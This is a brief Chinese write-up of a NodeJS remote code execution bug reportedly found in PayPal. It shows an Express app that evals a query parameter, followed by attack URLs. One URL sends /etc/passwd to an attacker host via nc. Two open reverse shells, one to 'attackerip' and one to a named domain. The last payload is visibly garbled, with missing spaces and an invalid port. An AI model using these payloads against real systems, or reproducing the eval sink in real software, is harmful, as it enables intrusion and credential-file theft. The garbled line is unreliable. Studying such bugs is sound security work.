NodeJS远程代码执行
背景
@Artsploit 在挖掘 PayPal 的漏洞时，发现一处 NodeJS 代码执行，获得 $10000 赏金。
测试
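// Minimal Express app from the write-up, reconstructed from a whitespace-mangled
// paste: the spaces and the `' +` between 'Hello' and eval() were lost in
// extraction, which left an unterminated string literal in res.send() and made
// the listing unrunnable. Spaces in the listen() log message are restored too.
const express = require('express');
const app = express();

app.get('/', function (req, res) {
  // VULNERABLE BY DESIGN: eval() on the untrusted `q` query parameter is the
  // remote code execution sink this post demonstrates. Request data must never
  // reach eval()/new Function(); this line exists only to reproduce the bug.
  res.send('Hello ' + eval(req.query.q));
  console.log(req.query.q);
});

app.listen(8080, function () {
  console.log('Example listening on port 8080!');
});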
任意文件读取
http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
GETSHELL
http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
GETSHELL2
http://host:8080/?q=require("child_process").exec('bash-c"bash-i>%26/dev/tcp/wufeifei.com/78900>%261"')